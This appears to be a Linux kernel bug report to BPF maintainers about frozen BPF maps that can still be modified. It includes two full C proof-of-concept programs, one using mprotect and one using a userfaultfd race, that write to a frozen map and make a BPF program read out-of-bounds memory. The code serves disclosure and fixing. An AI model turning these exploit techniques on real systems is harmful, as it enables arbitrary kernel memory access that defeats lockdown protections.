Hi! I saw that BPF allows root to create frozen maps, for which the verifier then assumes that they contain constant values. However, map freezing is pretty wobbly: 1. The syscalls for updating maps from userspace don't seem to lock the map at all. 2. BPF doesn't account for the fact that mprotect() can be used to arbitrarily flip VM_WRITE on and off as long as VM_MAYWRITE is set. (crasher attached as bpf-constant-data-mprotect.c) 3. It is assumed that a memory mapping can't be used to write to a page anymore after the mapping has been removed; but actually, userspace can grab references to pages in a VMA and use those references to write to the VMA's pages after the VMA has already been closed. (crasher attached as bpf-constant-data-uffd.c, compile with "gcc -pthread ...") These things are probably not _huge_ concerns for most use cases, since you need to be root to hit this stuff anyway - but I think it'd be desirable for BPF to actually be memory-safe (and the kernel lockdown folks would probably appreciate not having such a glaring hole that lets root read/write arbitrary memory). The third point is particularly hard to solve without adding more constraints on the userspace API; I think that tightening up map freezing would require ensuring that the map has *never* been mapped as writable. Is there a reason why the verifier doesn't replace loads from frozen maps with the values stored in those maps? That seems like it would be not only easier to secure, but additionally more performant.
/*
 * bpf-constant-data-uffd.c
 *
 * Proof of concept: write to a frozen, program-read-only BPF array map
 * through a page reference that outlives the writable mapping.
 *
 * Sequence:
 *   1. create a one-element array map and mmap() it read/write;
 *   2. start a thread whose process_vm_writev() targets that mapping and
 *      whose source buffer lives in a userfaultfd-registered page, so the
 *      call stalls on the missing-page fault;
 *   3. munmap() the map, freeze it, and load a BPF program that uses
 *      map[0] as an offset;
 *   4. resolve the fault with UFFDIO_COPY so the stalled write completes,
 *      then run the program.
 *
 * Build with: gcc -pthread ...
 */
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/prctl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <stdint.h>
#include <sys/socket.h>
#include <string.h>
#include <poll.h>
#include <sys/uio.h>
#include <fcntl.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))

/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10

/* Expands to TWO instructions: a 64-bit immediate load occupies two slots. */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_LD | BPF_DW | BPF_IMM, \
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = 0, \
    .imm = (__u32) (IMM) }), \
  ((struct bpf_insn) { \
    .code = 0, /* zero is reserved opcode */ \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
  ((struct bpf_insn) { \
    .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = OFF, \
    .imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_MOV | BPF_X, \
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = 0, \
    .imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })
#define BPF_ALU32_IMM(OP, DST, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ALU | BPF_OP(OP) | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
  ((struct bpf_insn) { \
    .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = OFF, \
    .imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = OFF, \
    .imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
  ((struct bpf_insn) { \
    .code = BPF_JMP | BPF_CALL, \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
  ((struct bpf_insn) { \
    .code = BPF_JMP | BPF_OP(OP) | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = OFF, \
    .imm = IMM })
#define BPF_EXIT_INSN() \
  ((struct bpf_insn) { \
    .code = BPF_JMP | BPF_EXIT, \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = 0, \
    .imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_MOV | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })

/* Thin wrapper around the raw bpf() syscall; returns its result unchanged. */
int bpf_(int cmd, union bpf_attr *attrs)
{
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

/*
 * Create a BPF_MAP_TYPE_ARRAY map with 4-byte keys.
 * Returns the map fd; exits the process on failure.
 */
int array_create(int value_size, int num_entries, unsigned int flags)
{
  union bpf_attr create_map_attrs = {
    .map_type = BPF_MAP_TYPE_ARRAY,
    .key_size = 4,
    .value_size = value_size,
    .max_entries = num_entries,
    .map_flags = flags,
  };

  int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
  if (mapfd == -1)
    err(1, "map create");
  return mapfd;
}

/* Issue BPF_MAP_FREEZE on the map; exits the process on failure. */
void map_freeze(int fd)
{
  union bpf_attr attr = { .map_fd = fd };

  if (bpf_(BPF_MAP_FREEZE, &attr))
    err(1, "freeze map");
}

/*
 * Load the instructions as a socket-filter program and print the verifier
 * log. Returns the program fd; exits the process on failure.
 */
int prog_load(struct bpf_insn *insns, size_t insns_count)
{
  /*
   * Start with an empty string: if the kernel writes nothing into the
   * buffer, printing it below would otherwise read uninitialized memory.
   */
  char verifier_log[100000] = "";
  union bpf_attr create_prog_attrs = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = insns_count,
    .insns = (uint64_t)(uintptr_t)insns,
    .license = (uint64_t)(uintptr_t)GPLv2,
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)(uintptr_t)verifier_log
  };

  int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
  /* printf() may clobber errno; keep the syscall's value for err(). */
  int errno_ = errno;
  printf("==========================\n%s==========================\n",
         verifier_log);
  errno = errno_;
  if (progfd == -1)
    err(1, "prog load");
  return progfd;
}

/*
 * Load the program and attach it to one end of an AF_UNIX datagram
 * socketpair. Returns the other end; writing to it runs the filter.
 */
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)
{
  int progfd = prog_load(insns, insns_count);

  // hook eBPF program up to a socket
  // sendmsg() to the socket will trigger the filter
  // returning 0 in the filter should toss the packet
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
    err(1, "socketpair");
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    err(1, "setsockopt");
  return socks[1];
}

/* Send one byte through the socket so the attached filter runs. */
void trigger_proc(int sockfd)
{
  if (write(sockfd, "X", 1) != 1)
    err(1, "write to proc socket failed");
}

/* Page registered with userfaultfd; source of the delayed write. */
static unsigned long *uffd_mapping;
/* Writable mapping of the BPF map; destination of the delayed write. */
static unsigned long *mapping;

/*
 * Copy 8 bytes from uffd_mapping to the BPF map mapping within our own
 * process. Reading the source faults on the userfaultfd region, which
 * stalls the call until main() resolves the fault.
 */
static void *thread_fn(void *dummy)
{
  (void)dummy;

  struct iovec local_iov = { .iov_base = uffd_mapping, .iov_len = 8 };
  struct iovec remote_iov = { .iov_base = mapping, .iov_len = 8 };

  if (process_vm_writev(getpid(), &local_iov, 1, &remote_iov, 1, 0) != 8)
    err(1, "process_vm_writev");
  return NULL;
}

int main(void)
{
  int small_map = array_create(8, 1, BPF_F_RDONLY_PROG|BPF_F_MMAPABLE);

  /* map the small_map */
  mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, small_map, 0);
  if (mapping == MAP_FAILED)
    err(1, "mmap bpf map");

  /* set up a userfaultfd region as uffd_mapping */
  int uffd = syscall(__NR_userfaultfd, 0);
  if (uffd == -1)
    err(1, "userfaultfd");
  struct uffdio_api api = { .api = 0xAA };
  if (ioctl(uffd, UFFDIO_API, &api))
    err(1, "uffd api");
  uffd_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                      MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (uffd_mapping == MAP_FAILED)
    err(1, "mmap anon");
  struct uffdio_register reg = {
    .range = {
      .start = (unsigned long)uffd_mapping,
      .len = 0x1000
    },
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  if (ioctl(uffd, UFFDIO_REGISTER, &reg))
    err(1, "uffd register");

  /* start a thread that will take a reference to the BPF map's page,
   * then stall on the userfaultfd */
  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    err(1, "pthread_create");

  /* crude synchronization: give the thread time to block in the fault */
  sleep(1);

  /* unmap the small_map; the other thread will still be holding a
   * reference to the page in it */
  if (munmap(mapping, 0x1000))
    err(1, "munmap");

  /* freeze the map */
  map_freeze(small_map);

  /* load a program while the map still contains zeroes */
  struct bpf_insn insns[] = {
    // r0 = &map[0]
    BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // r1 = map[0]
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

    // r2 = *(&map[0] + map[0])
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),

    // return 0
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));

  /* unblock the other thread, which will then overwrite the map contents */
  unsigned long buf[0x1000/8] = { 0xdeae000000000000 };
  struct uffdio_copy copy = {
    .dst = (unsigned long)uffd_mapping,
    .src = (unsigned long)buf,
    .len = 0x1000
  };
  if (ioctl(uffd, UFFDIO_COPY, &copy))
    err(1, "uffd copy");
  if (pthread_join(thread, NULL))
    err(1, "pthread_join");

  /* run the program with bogus data */
  trigger_proc(sock_fd);
  return 0;
}
/*
 * bpf-constant-data-mprotect.c
 *
 * Proof of concept: write to a frozen, program-read-only BPF array map by
 * mapping it read-only and then turning the mapping writable with
 * mprotect().
 *
 * Sequence:
 *   1. create a one-element array map and freeze it;
 *   2. load a BPF program that uses map[0] as an offset;
 *   3. mmap() the map with PROT_READ, mprotect() it to PROT_READ|PROT_WRITE,
 *      and overwrite map[0];
 *   4. run the program.
 */
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/prctl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <stdint.h>
#include <sys/socket.h>
#include <string.h>
#include <poll.h>
#include <sys/uio.h>
#include <fcntl.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))

/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10

/* Expands to TWO instructions: a 64-bit immediate load occupies two slots. */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_LD | BPF_DW | BPF_IMM, \
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = 0, \
    .imm = (__u32) (IMM) }), \
  ((struct bpf_insn) { \
    .code = 0, /* zero is reserved opcode */ \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
  ((struct bpf_insn) { \
    .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = OFF, \
    .imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_MOV | BPF_X, \
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = 0, \
    .imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })
#define BPF_ALU32_IMM(OP, DST, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ALU | BPF_OP(OP) | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
  ((struct bpf_insn) { \
    .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = OFF, \
    .imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = OFF, \
    .imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
  ((struct bpf_insn) { \
    .code = BPF_JMP | BPF_CALL, \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
  ((struct bpf_insn) { \
    .code = BPF_JMP | BPF_OP(OP) | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = OFF, \
    .imm = IMM })
#define BPF_EXIT_INSN() \
  ((struct bpf_insn) { \
    .code = BPF_JMP | BPF_EXIT, \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
    .dst_reg = 0, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
    .dst_reg = DST, \
    .src_reg = SRC, \
    .off = 0, \
    .imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
  ((struct bpf_insn) { \
    .code = BPF_ALU64 | BPF_MOV | BPF_K, \
    .dst_reg = DST, \
    .src_reg = 0, \
    .off = 0, \
    .imm = IMM })

/* Thin wrapper around the raw bpf() syscall; returns its result unchanged. */
int bpf_(int cmd, union bpf_attr *attrs)
{
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

/*
 * Create a BPF_MAP_TYPE_ARRAY map with 4-byte keys.
 * Returns the map fd; exits the process on failure.
 */
int array_create(int value_size, int num_entries, unsigned int flags)
{
  union bpf_attr create_map_attrs = {
    .map_type = BPF_MAP_TYPE_ARRAY,
    .key_size = 4,
    .value_size = value_size,
    .max_entries = num_entries,
    .map_flags = flags,
  };

  int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
  if (mapfd == -1)
    err(1, "map create");
  return mapfd;
}

/* Issue BPF_MAP_FREEZE on the map; exits the process on failure. */
void map_freeze(int fd)
{
  union bpf_attr attr = { .map_fd = fd };

  if (bpf_(BPF_MAP_FREEZE, &attr))
    err(1, "freeze map");
}

/*
 * Load the instructions as a socket-filter program and print the verifier
 * log. Returns the program fd; exits the process on failure.
 */
int prog_load(struct bpf_insn *insns, size_t insns_count)
{
  /*
   * Start with an empty string: if the kernel writes nothing into the
   * buffer, printing it below would otherwise read uninitialized memory.
   */
  char verifier_log[100000] = "";
  union bpf_attr create_prog_attrs = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = insns_count,
    .insns = (uint64_t)(uintptr_t)insns,
    .license = (uint64_t)(uintptr_t)GPLv2,
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)(uintptr_t)verifier_log
  };

  int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
  /* printf() may clobber errno; keep the syscall's value for err(). */
  int errno_ = errno;
  printf("==========================\n%s==========================\n",
         verifier_log);
  errno = errno_;
  if (progfd == -1)
    err(1, "prog load");
  return progfd;
}

/*
 * Load the program and attach it to one end of an AF_UNIX datagram
 * socketpair. Returns the other end; writing to it runs the filter.
 */
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)
{
  int progfd = prog_load(insns, insns_count);

  // hook eBPF program up to a socket
  // sendmsg() to the socket will trigger the filter
  // returning 0 in the filter should toss the packet
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
    err(1, "socketpair");
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    err(1, "setsockopt");
  return socks[1];
}

/* Send one byte through the socket so the attached filter runs. */
void trigger_proc(int sockfd)
{
  if (write(sockfd, "X", 1) != 1)
    err(1, "write to proc socket failed");
}

int main(void)
{
  int small_map = array_create(8, 1, BPF_F_RDONLY_PROG|BPF_F_MMAPABLE);

  /* freeze first, so the program below is loaded against a frozen map */
  map_freeze(small_map);

  struct bpf_insn insns[] = {
    // r0 = &map[0]
    BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // r1 = map[0]
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

    // r2 = *(&map[0] + map[0])
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),

    // return 0
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));

  /* map read-only, then flip the mapping to writable via mprotect() */
  unsigned long *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED,
                                small_map, 0);
  if (mapping == MAP_FAILED)
    err(1, "mmap");
  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
    err(1, "mprotect");

  /* overwrite map[0] after the program has already been loaded */
  *mapping = 0xdeae000000000000;

  /* run the program with the modified map contents */
  trigger_proc(sock_fd);
  return 0;
}